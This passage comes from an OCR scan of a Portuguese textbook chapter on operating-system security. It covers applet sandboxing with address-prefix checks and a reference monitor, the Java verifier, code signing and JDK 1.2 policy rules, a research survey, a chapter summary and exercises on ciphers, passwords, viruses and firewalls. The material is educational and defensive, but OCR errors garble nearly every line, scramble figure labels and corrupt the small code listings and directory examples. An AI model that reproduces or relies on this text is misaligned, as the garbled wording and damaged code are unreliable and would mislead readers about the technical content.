ma maneira, as JMPs rdativas sao faceis dc vcrificar. Sc a 
applet contiver algimi código que lenie sair da caixa de 
areia de código, ele sera rejeilado e nao sera executado. 


Endereęo 
virtual 
eon MB 


256 

224 

192 

160 

128 

96 

64 

32 

0 




Mon. Ref. 








Dados 2 

Código 2 



Dados i 

Código i 


} 


(a) 


Monitora as 
referencias 
para verificaęao 
do sistema 


Applet 2 


Applet 1 


MOV FM, SI 
SHR #24 1 SI 
CMP SI, S2 
TRAPNE 
JMP (R1> 


(b) 


Figura 9.35 (a) Memória dividida em caixas de areia de 16 MB. 
(b} Uma maneira de veriftcar a va!idade de uma instruęao. 


De modo semelhante, temativas de obier acesso a dados 
fora da caixa de areia de dados fazem com que a applet 
seja rejeitada. 

A parte dificil sc refcrc as instmędes dc JMPs dlnami- 
cas, A maioria das maąuinas tem uma instruęao na qual o 
endereęo do salto deve ser calcu lado em tempo de execu- 
ęao, colocado cm um registrador c cmao desviado para la 
indiretamente — por ęx.cmp]o r por JMP (R1), para saltar 
para o endereęo eon lido no registrador 1. A validade dessas 
instruęoes deve ser vcrificada em termos de tempo de exe- 
cuęao. Tsso e possfvel inserindo-se um código logo ames do 
salto indireto para tesla i o endereęo dc destino* Urn exem- 
plo desse teste e most rad o na Figura 9.35 (b). Lembre-se de 
qtie todos os cndereęos validos tem os mesmos k bits mais 
stgnificativos: pomimo, esse prelixo pode ser armazenado 
em um registrador auxiliar S2, por exemplo. Bsse registra¬ 
dor nao pode ser usado pela própria applet, o que pode 
exigir que da seja reescrita para evitar esse registrador. 

O código funciona da seguinte maneira: primeiro, o 
endereęo dc destino que esta sen do inspecionado c copiado 
para um registrador, SI. Esse registradore deslocado para a 
di rei ta prerisamente pelo nu mero de bits correto para iso- 
lar o prefixo comuni cm Si. Em seguida, o prefixo isolado 
ć comparado ao prcfixo correto, carrcgado inicialmeme cm 
S2. Se nao forem iguais, ocorrera u ni desvio e a applet sera 
encerrada* Essa seąuencia de código requer quatro tnstru- 
ęoes e dois reglstradores auxiliares. 

Inserir um código em um program a binario em execu- 
ęao requer algum esforęo, mas e possivd. Seria mais sim- 
ples se a applet estivesse presente na forma de código-lonte 
e se fosse compilada localmenie medianie o uso de um 
compilador confiavel, que verificasse automaticamente os 
endercęos esiaticos e inserisse eódigos para verificar ąuais 
scrao dinamicos durante a exccuęao. De qualquer modo, 
ha alguma sobrecarga em tempo de execuęao associada as 
verificaę6es dinamicas. Wahbe et al. (1993} mediram cssa 
sobrecarga como algo próximo de 4 por cento, o que geral- 
mente e aceitavd. 

Um segundo próbie ma que deve ser resolvido e o que 
a eon tece ąuando uma applet tema fazer uma cha mada de 
sistema. A soluęao, nesse caso, e simples. A lustruęao da 
cha mada de sistema e substltuida por uma chamada a um 
módulo espedal, o monitor de referencja, ]io mesmo 
passo em que as verificaęoes de endereęo dinamico sao in- 
seridas (ou, se o código-fonte estiver disponivel r ligando a 
uma biblioteca cspedał que chama o monitor dc referen¬ 
da, em vez de fazer chamadas de sistema)* De uma ma¬ 
neira ou de outra, o monitor de referencja examina cada 
chamada tentada e decide sc e seguro executa-la. Sc a cha¬ 
mada for considerada aceitavel — como escrevcr um arqui- 
vo ternporario em urn determinado diretório auxiliar —, 
sera permitido que a chamada continue. Se a chamada for 
reconheddamente perigosa ou o monitor de referenda nao 
conseguir falar nada sobre da, a applet sera terminada. Se 
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o monitor de referenda puder dizer qtml applet o diamou, 
urn unito monitor de referenda, em aigum lugar da me- 
mória, podera iratar as requisięoes de todas as applets. O 
monitor de referenda normalnienie aprende sobre as per- 
missócs a partir dc um arquivo dc configuraęao. 

lnterpretaęao 

O scgundo modo de executar applets na o conflaveis 
e execuLa-las int erpretalivameme e na o deixa-la$ lomar o 
controle real do hardware. Essa e a estrategta usada pdos 
navegadores da Web. As applets das paginas da Web sao 
quase sempre es alias em Java, que i urna linguagem de 
prograniaęao noirnal, ou em urna linguagem interpretativa 
de alto irivel, como a TCJL seguro ou Jayascript, As applets 
Java sao ant es compiladas para urna linguagem de maqui- 
na virtuai orientada h pilha, cha mada JVM (Java vinual 
machinę — maquina virtua3 Java). Sao essas applets JVM 
que sao colo ca das nas paginas da Web. Ao serem baixadas, 
elas sao submetidas a um imerpretador JVM qne fi ca no 
navegador r conforme ilustra a Figura 9.36. 

A yantagcm dc exccutar código interpmado, cm vez 
de coropilado, e que cada instruęao e exammada pelo in- 
icrpretador ames de ser executada. Tsso da ao imerpretador 
a opommidade de verificar se o endereęo e valido. Alem 
disso, as cha madas de stsiema tambem sao capturadas e 
imcrpreiadas. Como cssas diamadas sao iraiadas e unia 
ąucstao puc intcressa a poliiica de seguranęa. Por cxcm- 
plo H se urna applei for confiavel (digamos, se ela vier de um 
disco local), suas chamadas de sistema deverao ser execu- 
tadas sem ąuestionamentos. Contudo, se urna applet nao 
lor confiayel (por exemplo, se ela vier pcla Internet), ela 
podera ser colocada no que ć, efetivamenie, urna caixa de 
ar da, a firn de restringir seu comportamento* 

Linguagens de alto nivel podem tambem ser inter- 
prctadas. Nesse caso, nao sao u sad os endercęos de ma- 
quina, poisassim nao ha perigo de um código imerpreta- 
do lenta r, desautorizadameiuc, obtcr acesso a memória. 
A desvantagcm da interprciaęao, cm geral, e que ela e 
muilo lenta sc comparada a execuęao do código compi- 
lado nativo. 


Espaęode 



9.8.71 Seguranęa em Java 

A linguagem de prograniaęao Java e o sistema de exe- 
cuęao Java (run-time system) que a acompanha Foram proje- 
lados para que um programa pudesse serescrito c complla- 
do urna vez, transportado pela Internet na forma binario c 
ex ecu ta do em qualquer maąuina que de su porte a Java. A 
seguranęa faz parte do projeto do Java desde o budo. Nesta 
seęao descreveremos como lun ci ona essa seguranęa, 

Java e u ma linguagem tipifkada e segura, o qne signi- 
Eka que o compilador rejeitara qualquer temativa de uso 
de mna variavcl que nao for compatfyel com seu lipo. Por 
outro lado, considere o seguimc código em linguagem C: 

naughty_func() 

[ 

char 

p - randO; 

‘p = 0; 

1 

Ele gera um mimero aleatório e armazena-o no port- 
teiro p. Emlo, a rm a ze na um by te 0 no endereęo contido 
em p t sohrescrevendo o que estava la, seja código ou dados, 
Em Java, consiruęóes que misiu ram os tipos, como nesse 
código, sao proibidas pela gramatica. Alem disso, Java nao 
tern variaveis ponteiros, conversoes de tipos, alocaęao de 
memória controlada pelo usuario (como mdlocę free) e to¬ 
das as referendas aos yetores sao yerificadas em tempo de 
execuęao. 

Os programas em Java sao compilados e o resultado e 
um código binario intermediario cha mado byte codę da 
J VM. A JVM tem ccrca dc ccm instruęócs; a maioria dclas 
insere objetos de um determinado tipo na pilha, retira-os 
da pilha ou combi na os doisitens na pilha aritmeticamente. 
Esses programas JVM em geral sao imerpretados — embo- 
ra, em alguns casos, possani ser compilados em linguagem 
de maquina para uma execuęao mais rapida. No moddo 
Java, as applets enviadas pela internet para execuęao re- 
mota sao programas JVM. 

Quando uma applet chcga, da e exccutada por um 
yerificador de byte codę da JVM que yerilica se a applet 
obedece a eertas regras. Uma applet adequadameme com- 
pi lada o be dc cera automaticameme a essas regras, mas nao 
ha nada que impeęa um usuario com mas inteneoes de es- 
crevcr uma applet JVM na linguagem asscmbiy da JVM. A 
yerificaęao consiste nos seguinles testes: 

1. A applet tenta forjar ponteiros? 

2. Ela viola as restrięóes de acesso em membros de 
classes privadas? 

3. Ela tema usar uma yariavd de um tipo como se fos- 
se de outro? 


Figura 9.36 As applets podem ser interpnetadas por um 4. Ela gera transbordamento (overflow) ou esvazia- 

nayegador da Web, niemo (miderflow) na pilha? 
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5. Ela converte ilegalmente variaveis de um tipo para 
outro? 

Se a applet passar por todos esses testes, ela podera ser 
executada com seguranęa e sem reccio de dar acesso a inna 
memória que nao scja sua. 

Co n tu do, as applets ainda pudem fazer diamadas de 
sistema, chamando os nietodóS (procedimenios) Java que 
servem para isso, O modo como Java trata esse próbie ma 
evoltiiu com o tempo. Na primeira versao da Java, o JDK 
[Java Devetopment Kit — fcrramcntas para desenvolvimemo 
em Java) 1.0, as applets eram divididas em duas elasses: 
confiaveis e nao confiavei$. As appkts trazidas do disco lo- 
cal eram confiaveis e a elas era permitido fazer qualquer 
cliamada de sistema que ąuisessem. Por outro lado, as applets 
que eram trazidas da Internet nao eram confiaveis. Elas 
executavam em uma caixa de areia, confonne mostra a Fi¬ 
gura 936, e quase nada Ihcs era permitido. 

Dcpois dc algo ma cxpcrienda com essc moddo, a Son 
pertebeu que ele era rnuito restritivo. No JDK U, foi em- 
prcgada a assinatura dc código. Quando uma applet chcga- 
va pela Internet, era yerificado se ela estava assinada por 
uma pessoa ou por uma organizaęao considerada confiavel 
pdo usuario (conforme uma lista de assinantes confiavds, 
definida pdo usuario). Se fosse confiavel, a applet era per- 
milido fazer o que quisesse, Caso contrario, ela era execu- 
tada em uma caixa de areia e ficava bastame restrita. 

Com a experienria, isso tambem se provou insatisfa- 
torio e, assim, o moddo de seguranęa fol alterado nova- 
menie. O JDK 1.2 okręcę uma polilica de seguranęa de 
granularidade lina c configuravel, quc se aplica a todas as 
applets, locaise remotas, O moddo de seguranęa e bastante 
complicado, tanto que fot possivd cscrcver um livro intciro 
para tratar disso (Gong, 1999); portanto, faremos a pena $ 
um peąueno resumo de alguns aspectos. 

Gada applet tern duas caracterfsdcąs basicas: de onde da 
vem e quem a assinou, De ondc ela vem e seu URL (uniform 
resource bmtor — localizador im i formę de recurso}; quem a 
assSnou consiste na chave privada que Foi usada para a assi- 
natura, Gada usuario pode eriar uma politiea de seguranęa a 
partir de uma lista de regras* Gada regra pode eon ter um URL, 
um assinantc, um objęto e uma aęao que a applet seja capaz 
de rcalizar sobrc um objęto, se o URL da applet e o assinantc 
forem comparivds, ConcciiuaJjnentc, a informaęao fomedda 
e mostra da na Tabela 9.3, embora a lormataęao real seja di- 
ferente e esteja relarionada com a bierarquia de dasses Java. 


URL 

Signer 

Objęto 

Aęao 

www.taxprep.com 

TaxPrep 

/usri 

susan/ 1040.xls 

Read 

* 


/usr/tmp/* 

Read, Write 

www. microsoft. com 

Microsoft 

/usr/ 

susan/Office/- 

Read, Write, 
Delete 


I Ta be la 9.3 Alguns exemplos de proteędo que podem ser 
especificados com o JDK 1.2. 


Um tipo de aęao permite o acesso ao arquivo. A aęao 
pode detcrniLnar um arquivo ou um diretório cspedfico, 
o conjimto dc todos os arquivos em um dado diretório ou o 
conjmuo de todos os arquivos e diretórios comidos recur- 
5ivamente em um dado diretório* As tres li n bas da Tabela 
93 correspondem a esses tres casos. Na primeira lin ha, a 
usuaria, Susan, conFigurou as permissoes de sen arquivo 
para que as applets provenientes da maquiua que ca tai¬ 
ła os impostos — <www.taxprep.com> — e assinadas pela 
empresa tenham acesso a Icilura de sens dados sobre im¬ 
postos localizados noarquivo i040.xls. Essc c o unicoarąui- 
vo que pode ser lido e nenhuma omra applet pode le-lo. 
Alem disso, todas as applets, de qualquer lugar, assinadas 
ou nao, podem ler e escrever arquivos em Jusr/tmp. 

Poi" outro lado, Susan tambem confia tanto na Micro¬ 
soft que permite que as applets provenientes tle sens sites e 
assinadas pela empresa leiam, e$crevam e removam todos 
os arqulvos, na arvore de diretórios, que fiquem abaixo do 
diretório Office — para, por exenipio, corrigir falhas e insta- 
lar novas versoes do software* Para verificar as assinaturas, 
Susan dcvc mant er em sen disco rtgido as chaves piiblicas 
necessarias ou adquiri-las dinamicameme — por exempb, 
na lorma dc um certificado assinado por uma empresa na 
qual ela confle e cuja chave publica ela ja possua* 

Os arqutvos nao sao os unlcos recursos passweis de 
proteęao* O acesso a rede tambem pode ser protegido, Os 
objetos, nesse caso, cspccificam poiłaś sobrc compu ladores 
especfficos. Um computador e especificado por um endere- 
ęo 1P ou por um no mc DNS; as porlas dc uma maquina sao 
especificadas por um intervalo numerico. Entre as possfveis 
aęoes estao o pedido para sc conectar a um computador 
remoto c a aceitaęao dc concxoes originadas pdo compula- 
dor remoto. Dessc modo, um acesso a rede pode ser permi¬ 
tido a urna applet, mas esse acesso pode estar restrito a se 
comuntcar somente com compmadores que explicitamen- 
te faęam pane da lista de permissoes. As applets podem 
carregar dinamicamente um código adidonal (dasses) con- 
formc for ncccssario, mas os carrcgadores de elasses Forne- 
cidas pelo usuario sao capazes de controlar precisamente 
de quais maquinas essas elasses podem ser provementes* 
Existem ainda muitos outros aspectos de seguranęa. 

Pesquisas em seguranęa 

A seguranęa de computadores e um topi co de grandę 
interesse, com uma grandę quantidade de pesąuisas em cor¬ 
so. Um tópico importante e a computaęao confiavel, em 
especial as plataformas que a viabiltzem (Erickson, 2003; 
Garfinkel et al., 2003; Rcld e Gacili, 2005; Thibadeau, 
2006) e politicas piiblicas assodadas a clas (Anderson, 
2003). jModelos e implementaęao de Huxos de informa- 
ęao tambem estao sendo inveśtigados (Castro et al, 2006; 
Efstalhopoulos et ab, 2005; Hicks et ab, 2007; Zeldovicli 
et ab, 2006). 


9.9 
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A ąuestao da autenticaęao do usuario (induindo bio- 
metria) tambem e import a nte (Bhargav-Spamzel et al, 
2006: Bergadano et al, 2002; Pusara e Brodley, 2004; Sas- 
se, 2007; Yoon ct al, 2004). 

Dados todos os problemas causa dos pdo malware boje 
emdia, existem miuLaspesąmsassobre transbordamentodo 
btiifer e outros meios de expioraęao e tambem sobie como 
Udar com eles (Hackett et a l, 200-6; Jones, 2007; Kuper- 
man et al, 2005; Le e Soffa, 2007; Prasad e Chiueh, 2003). 

Todas as for mas de malware sao ampla mente estuda- 
das, induindo cavalos de Troia (Agrawal et al., 2007; Franz, 
2007; Moflie et al., 2006), virus (Biuschi et al, 2007; 
Cheng et al., 2007; Rieback et aL, 2006), vermes (Abde- 
lhafez et al, 2007; Jtang e Xu, 2006; Kienzle e El der, 2003; 
Tang e Chen, 2007), spyware (Egele et al., 2007; Felten 
e Halderman, 2006; Wu et al., 2006) e rootkits (Kruegel 
et al, 2004; Levine et al., 2006; Quynh e Takefuji, 2007; 
Wang e Dasgupta, 2007), Como vfms, spyware e rootkits 
tentam se esconder, existem trabalhos reladonados a tecno- 
logia stcalth c como c possivel dctecta-Jos (Carpcntcr et al., 
2007; Garfinkd et al, 2007; Łyda c Hamrock, 2007). Ate a 
esteganograda tambem ja foi estudada (Harmsen e Peali¬ 
man, 2005; Kratzer et al., 2006). 

Ś desnecessario dizer que existem muitos trabalhos 
reladonados a defesa de sistemas contra malware. Alguus 
focamos programas antmrus (Henchiri e Japkowicz, 2006; 
Sanok, 2005; Sliegler et al, 2006; Dłuski et al, 2005). Sis- 
temas de detecęao de intmsao estao sendo basta nte estm 
dados e ha trabalhos de pesąuisa reladonados □ invasoes 
aiuais e iiwasóes históricas (King e Cben, 2005; 2QQ6; 
Saidi, 2007; Wang et al. r 2006b; Wheeler e Fulp, 2007). 
Cliamarizes sao urn aspecto naiuralmente Import antę desses 
sistemas e tambem recebem basta nte atenęao' (Ąnagnostakis 
et al, 2005; Asrigo et al, 2006; FortokaMs et al, 2006). 


9.10 


Os computadores normalnienie armazenam dados va- 
Iiosos e confidendałs, induindo dedaraęoes dc hupostos, 
niimeros de cartocs dc credito, planos dc negócios, segre- 
dos dc ncgociaęocs, c muito mais. Os usuarios desses com¬ 
putadores costumam ser basta mc cuidadosos no sentido 
de manier esses dados em sigilo e nao pmnitir quc sejam 
adu Llera dos, o que faz com que os sistemas operacionais 
tenbam de oferecer boa seguranęa, Urna das maneiras de 
manier a informaęao em segredo e dfra-la e gerenriar as 
chaves com euidado. Algumas vezes e necessario tesiar a 
autcnticidade das informaęoes digitais e, nesse caso, po- 
dcm ser utilizados resumos criptograficos, assinaturas digi¬ 
tais e certifkados conccdidos por antoridades certificado- 
ras confiavcis. 

Os direilos de acesso podem ser modelados como urna 
grandę matriz, com as linlias representando os dommios 
(usuarios) e as colunas representando os objetos (arqmvos. 


por exemplo). Gada celula especifica os direilos de acesso 
do donifmo ao objęto. Como a matriz e esparsa, pode ser 
armazenada por linha, como unia lista dc capaddades que 
infonna o quc o domfnio pode fazer, ou por cołuna, como 
urna lista dc eontrole dc acessos que informa qucm pode 
acessar o objęto e dc quc mancira. A utilizaęao dc tecnicas 
for mais dc moddagem permite quc o fluxo dc infomiaęócs 
em mu sistema possa ser modelado e li mi ta do. Entretanto, 
algumas vezes ela pode vazar por canab oculios, como a 
modulaęao do uso da CPU. 

Em qualquer sistema seguro, os usuarios devem ser 
a u tent i ca dos. Isso pode ser fcito por mcio de algo quc o 
usuario saiba, ten ha, ou seja (biometria), A identificaęao 
por dois fatores, como o rcconheri mcnto pcla fris c u ma 
sen ha, pode ser ulilizada de forma a aumentar a seguranęa. 
Os imernos, como os empregados da enipresa, podem 
derrotar a seguranca do sistema de dhersas formas. Eles 
podem utilizar bombas lógicas programadas para explodir 
cm urna data especifica, portas dos fundos quc permitam 
acesso futuro ao invasor interno c rccorrcr a tccnica dc lo- 
gro na autcnticaęao do usuario, 

Muitos tipos de erro no eódigo podem ser explorados 
de forma a tomar o controie de programas e sistemas. Es¬ 
ses errps incluem transbordamentos de buffer, ataąues a 
cadeia de forma to, ataąues dc retorno a iibc, ataque por 
transbordamento de mimeros inteiros, ataąues por injeęao 
de eódigo c ataąues de escalada de privilegio, 

A Internet esta cheia de malware, induindo cavalos 
de Troia, virus, vermes, spyware e roolkits. Gada urn deles 
representa u ma ameaęa a eon fi den dal i dade e integridade 
dos dados. Para piorar, urn ataque por malware e capaz de 
tomar urna maąuina e transforma-la em urn zumbi que 
cnvia spam ou que da infcio a outros ataąues. 

Felizmente, existem dlversa$maneiras as ąuais urn sis¬ 
tema pode recorrer para se defender. A mellior estrategia e 
a defesa em profundidade, que faęa uso de multiplas tecni- 
cas, Algumas deias incluem firewails, detectores de virus, 
assinatura de eódigo, enearceramento, sistemas de detecęao 
de inclusao e encapsulamento de eódigo móvd. 

Problemas 

1. Quebre o seguinte eódigo monoalfabetko; o tcxto puro 
(em ingies), contendo apenas letras, e urn fragmentu dc 
um poenia bastantc conheddo dc Lewis Carroll 

kfd ktbd fzm cubd kfd pzyiom mztx ku kzyg ur bzha kf- 
them ur nifudm zhx mftnm zhx mdzythcpzą urezsszedm 
zhx gthem zhx pfa kfd mdz tm sutythe fuk zhx pfdkfdi 
mcm fzld pthem sok pztk z stk kfd uamkdim eiidx sdruid 
pd fzld uoi efzk rui mubd ur om zid nok ursidzkf zbx zyy 
ur om zid rzk hu folia nizix kfd ezindhkdi kfda kfzhgdx 
ftb bncf rui kfzk 

2, Considere um eódigo porchavesecreta qne tem urna matriz 
de 26 x 26, cujas colunas sao indexadas por ABC Zc cujas 
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Imhas lambem sio ABC ... Z. O texio pum e eriptografado a 
cada dois caracteres. O primdro caractere e a coluna; o $e- 
gimdo e a linha. A celula fonnada pela intcrsccęao da linha 
com a coluna comem os cara eterem do tcxlodfrado. Qual res- 
irięao deve ser imposta a matriz e quantas chaves existem? 

3. A criptografia por chave secreta e mais efkieme que a 
criptografia por chave publięa, mas rcąucr quc o emissor c 
o receptor combi nem antedpadamerite unia chave. Supo- 
nha que o emissor c o receptor nunca tenham se encon- 
trado, mas existe um lerteiro, de confianęa, que comparti- 
Ilia urna chave sccreia com o emissor e ta rabem companilha 
unia chave sccreia (diferente) com o receptor. Como o 
emissor e o receptor conseguem definir u ma nova cbave 
secreta compariilhada sob cssas ci ram stan ci as? 

4. De um exemplo simples de urna funęao matematica que, 
na primeira aproxiniaqaG, funrione como urna Iunęao de 
unia via, 

5. Suponha quc dois esiranhos* A e B, desejam se coniunicar 
utilizando dfragem dc chavc secreta, mas nao eomparti- 
Iham a diavc. Imagine que ambos confiam cni um lercci- 
ro, C cujo chavc publica ć ba sta me conhecida, Como os 
dois estranhos podem estabelecer uma nova chave com- 
partilhada secreta sob essas drarastancias? 

6. Imagine que, era oni da do momemo, um sisiema possui 
1.000 objelos e 100 dominios. Dos obje Los, I por cento 
esta acesswel (alguma combinaęao de r x w c x) cm lo- 
dos os dominios, 10 por ccnto estao acessfveis cm dois 
do mi ni os e os S9 por cento restantes estao acessfyeis cm 
somente um dormnio, Suponha que unia unidade de es- 
paęo seja neccssaria para armazenar um di rei to de acesso 
(alguma combi naęao de r f w t e x), o ID do objęto o u o ID 
do dommio, Quanto cspaęo ć necessario para armazenar 
a matriz de pmtcęao (a) inteira; (b) como A CL e (c) como 
lista de capacidades? 

7. Dois mecanismos dc protcęao diferentes que chegamos a 
discutlr sao as capacidadcs e as listas dc controic dc aces¬ 
so. Para cada um dos seguimes pro bierna s dc protcęao, 
diga ąiial desses mecanismos pode ser empregado. 

(a) Osvaldo quer que os arquivos dele possani ser lidos 
por qua!quer um, exceto por sen colega de escriiório. 

(b) Sflvia c Luis quercm compartilhar alguns arquivos 
sccrctos. 

(c) Letlcia quer que alguns de seus arquivos sejam pu- 
blicos. 

8 . Rcpresentc as propriedades c as permissoes most rad as 
nesta listagem dc um diretório UNIX como uma matriz dc 
proteęao. Okewaęao: osw ć um membro de dois grup os: 
users e devel; §mw e membro apenas de users. Tratę cada 
um dos dois us nanos e os dois grupos como um domuiio; 
assim, a matriz tera quatro lin bas (uma por domfnio) e 
quatro colunas (unia porarquivo). 

-r-A'-r— r — 2 gmw users 908 May 2616:45 PPP-Notes 

-rwx r-xr-x 1 asw devel 432 May 1312:35 progi 

-rw-rw-1 asw users 50094 May 3017:51 apraject.t 

r——■ 1 asw devd 13124 May3i 14:30 splash.gif 


9. Evpresse as permissoes mostradas na listagem dc um di¬ 
retório do problcma anterior como listas dc comrolc dc 
acesso. 

10. No esgucma Amocba, para proteger capacidades, um 
usuario pode pedir para quc o servidor pro duża uma nova 
capaddadc com alguns dircitos, quc poderia ser ofcrcci- 
da a um amigo. O que aconteceria sc o amigo pedisse ao 
scrvidor para rcmover mais alguns di rei los, a ii ni dc que 
o amigo pudesse ofereceressa capacidade a outra pessoa? 

11. Na Figura 9.11, nao ha uma seta do processo & para o 
objęto /. Seria pennitida essa seta? Se nao, qual regra es- 
tarła sendo violada se houvesse uma? 

12. Se mensagens dc processo para processo fossem per mi- 
tidas na Figura 9.11, quais regras sc aplicariam a elas? 
Em panicular, o processo B poderia envlar mensagens 
para quais processos? E para quais de nao poderia enviar 
mensagens? 

13p Considere o sistema de esteganografia da Figura 9J4. 
Cada pixel pode ser representado etn um cspaęo dc corcs 
por urn ponto tridimcnslonal com eixos para os yalores 
RGB (yermelho, vcide e azul), Usando esse cspaęo, ex- 
plique o que aconicce com a resoluęao de cores quando a 
es Lega nog rafia e usada nessa i ma gem. 

14. Um tcxto cm linguagem natura!, ASCII, pode ser com- 
primidę em pclo mc nos 50 por cento usando-se va rios 
algoritmos dc comprcssao. Com base nesse conhetimcn- 
to, qual e a capacidade esieganografica de uma ima gem 
de 1.600 x 1.200, para armazenar um texto ASCII (em 
bytes) nos bits menos significativos de cada plxel? Quan- 
to sera acrescido a essa imagem, por causa do uso dessa 
tecnica (presumindo que nao baja criptografia nem ex- 
pansao por causa da criptografia)? Qual seria a cficiencia 
desse esgucma, isto c, o nu mero total de byt es iransrmis- 
dos (considerando os bytes reIaiivos a tecnica)? 

15. Suponha quc lim grupo forte nic ntc coeso de polfttcos 
dissidcnics, quc vive cm um pais reprcssivo, csicja usan- 
do a esteganografia para enviar mensagens para fora do 
pais, informando sobre as condięóes locais, O govemo 
sabc disso c esta ten lando impedidos, enviando imagens 
falsas comendo mensagens esieganogralicas falsas. Como 
os dissidem.es podertam aj udar as pessoa s a distinguir as 
mensagens reais das falsas? 

16. Va aie o endereęo <www.cs.vu.nl/~ast> e c3ique no link 
covered writing , Siga as instruęóes para cxtrair as peęas* 
Responda as seguimes perguntas: 

(a) Qual o tamauho orlginal dos arquivos zebras c origi- 
nal-zebra s? 

(b) Quais peęas estao escondidas nos arquivos das zebras? 

(c) Quantos bytes estao secretameme armazenados no 
arquivo zebras? 

17. O computador que nao ni ostra a sen ha e mais seguro qne 
aquclc que mostra um asterisco para cada caractere digita- 
do, pois este ultimo reveia o tama n ho da sen ha para quem 
estiver próxlrao e que possa ver a te la. Ao su por que as 
sen bas sejam form ad as somente por caractcrcs de letras 




Sn#w 


Capitulo 9 Seguraręa 441 


maiiisculas, minusculas e por digitos e que as senhas de- 
vam ter, no mfnimo, clnco e, no maximo, oito caracteres, 
quao maiS SCguro seria se nao $e mostrasse nada? 

13. Depois de conseguir se graduar, voce se candidata a um 
trabalho como di retor de uin grandę centro compulacio- 
nćil dc uma universidade, quc possui apenas um vdho 
sistcma dc comptuador dc grandę porte, fora de linha, 
concctado a uma grandę redo local cujo servidor executa 
UNJX. Voce consegue o trabalho. Q uin ze mirtu tos depois 
de comcęar a trabalhar, sen assistente cmra explosiva- 
meme cm scu escriiório gritando: "Algum a luno desco- 
briu o algoritmo que u sam os para criptografar as senhas e 
o difundiu pcla Internet*', O que voce Jarla? 

19- O esąuema de proteęao Morris-Thompson com numeros 
aleatórios de n bits (sal) fot p roje lado para dificuliar que 
um invasor deseubra um grandę numerode senhas cripm- 
grafando antedpadamente as strings mais comuns, Esse 
esąuema tambem olerecc proteęao contra um c stu da mc 
que tente acertar a senha do superusuario a partir de su a 
maąuina? Suponha quc o arquivo dc senhas esteja dispo- 
mvel para leitura, 

20. Expłique de que forma o mecanismo de senhas do UNIK 
difere da dfragem, 

21. Suponha que o arquivo de senhas de um sistcma esteja 
dispomvel para um cracker. Dc quamo tempo extra cle 
vai precisar para descobrir todas as senhas se o sisiema es- 
tivcr utilizando ocsquema dc proteęao Morris-Thompson 
com n bits (sal)? E se o sistenia nao esliyer utilizando esse 
esąuema? 

22. Cite tres caractensticas quc um bom indieador biometrlco 
dcve ter para ser lilii na autenticaęao durante o processo 
de acesso ao sistcma. 

25. Um departamemo dc cienda da computaęao tern um 
grandę conjtmto de maąuinas UNIK em sua rede local. Os 
usuarios de qualquer maąuina podem emilir um comando 
do tipo 

rexec machined who 

e tero comando executando na machme4 t sem que o usua- 
rio prccisc se concctar a maąuina rcmota, fsso c imple- 
memado fazendo o ntkleo do usuario erwiar o comando 
e seu UTD para a maąuina rem ot a. Esse esąuema e seguro 
sc os nudeo forem todos confiaveis? O que aconteceria 
se alguinas maąuinas Eossem computadores pessoais dos 
estudantes c sem proteęao? 

24. Qual e a propriedade que a imple me ntaęao de senhas no 
UNIK tern em commn com o esquema de Lamport para 
acesso ao sistcma em uma rede insegura? 

25. O esąuema de senha de só uma vez de Lamport usa as 
senhas na ordern inversa. Nao seria mais simples usar f{s) 
na primeira vezna segunda vezeassim por dian te? 

26. Ha algum modo viavel de usaro hardware da MM U para 
impedir o tipo de ataque por transbordamento mostrado 
na Figura 9.22? Explique. 


27 . Cite uma caracteristica do compilador C que poderia cli- 
niinar um grandę numeru de vulnerabilidades de seguran- 
ęa. Porąue isso nao e mais amplameme im plenienia do? 

28 . O ataque dc um cavalo de lYoia pode fundonar cm um 
sistcma pro tęgi do por capacidades? 

29 . Quando um arquivo e removido T sens blocos geralmeme 
sa o colo ca dos na lista dc livres, mas nao sao apagados, 
Voce acha que seria unia boa kicia se o sistcma opcracio- 
nal apagasse todos os blocos antes de libera-los? Conside- 
rc em sua resposta tamo os faiores de seguranęa quanto 
os dc desempenho. ExpEiquc tambem os efeitos cm ca da 
um desses fatores. 

50- Como u ni vfrus parasita pode (a) assegurar que sera exe- 
cutado a mes de seu programa hospedeiro e <b> passar o 
controle de volta para seu hospedeim depois de fazęr o 
que tem de fazer? 

51 . Alguns sistemas operadonais cxigcm quc as partiędes dc 
disco comecem no infcio de uma irilha. Como ssso torna a 
vida mais fach para um virus de setor de inldaJizaęao? 

52 . Aliere o programa da Figura 9.25 para enęontrar todos os 
program as em C, em vez de todos os arqitivos exeeuiaveis, 

55 - O virus da Figura 9.30(d) esta criptografado. Como um 
dcdicado dentista do la bo rato rio antiyfms pode indicar 
qual parte do arquivo e a diave, para que ele possa de- 
criptar o virus e fazer sua engenharia reversa? O que Vir- 
gilio pode fazer para tornar o trabalho do dentista hem 
mais dificsl? 

54 . O vfrus da Figura 9.30(c) contem um compressor e um 
dcscompressor. O dcscomprcssor ć ncccssario para cx- 
pandir e exetutar o programa executave] que esta com- 
primido. Qual e o papci do compressor? 

55 . Cite uma desvantagem dc um vfrus dc criptogralia poli- 
mórlica do porno de vtsta do escńtor do vfrus. 

56 . Muitas vezes alguem segue as instruęóes a seguir para se 
rccupcrar dc um ataąue dc vfrus; 

1. Faęa a inicializaęao do sistcma infcctado. 

2. Faęa backup de todos os arquivos para um meio ex- 
terno. 

3. Ex ecute o fdisk pa ra fo rmata r o d i sco. 

4. Reinstale o sistcma operacional a partir do CD-ROM 
original. 

5. Recarrcgue os arqmvos que estao no meio externo. 
Cite dois erros graves nessas instruęoes, 

37. Os vfrus companhdros (virus quć nao modificam ne- 
nhum arquivo) sao possiveis no UNIK? Em caso afirmati- 
vo, como? Do contra rio, por quc nao? 

58 . Qual e a difercnęa entre um vfrus e um vemie? Como 
ca da um deles se reproduz? 

39 , Arquivus (archive$) que extraem a si proprios, que contem 
um ou mais arquivos comprimidos e nipa cola dos por um 
programa de exlraęao, freąuentcmenlc sao usados para 
distribuir próg rama s ou atuaiizaęoes de programas, Dis- 
cuta as implicaęocs dc seguranęa dessa ićcnica. 
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40- Discuta a possibilidade dc escrever um programa que 
tema outro programa como entrada t determma se ele 
comdm urn vfrus. 

41 , A Seęao 9,8,1 descrevc um conjimto dc rcgras dc firewall 
que limita o acesso cxtcrno a somentc trćs scrvięos, Des- 
crcva outro conjnnto dc rcgras quc possa ser acrcsccnta- 
do a esse firewall, dc modo a restringir o acesso futuro a 
esses scrvięos. 

42 . Em algumas maquinas, a instruęao SHR, usada na Figura 
9,35(b), prcenchc eom zeros os bits que nao sao utiliza- 
dos; cm om ras maquinas, o bit de sinal e deslocado a di- 
rcita, Para que a Figura 9.35(b) es tej a corrcia, importa o 
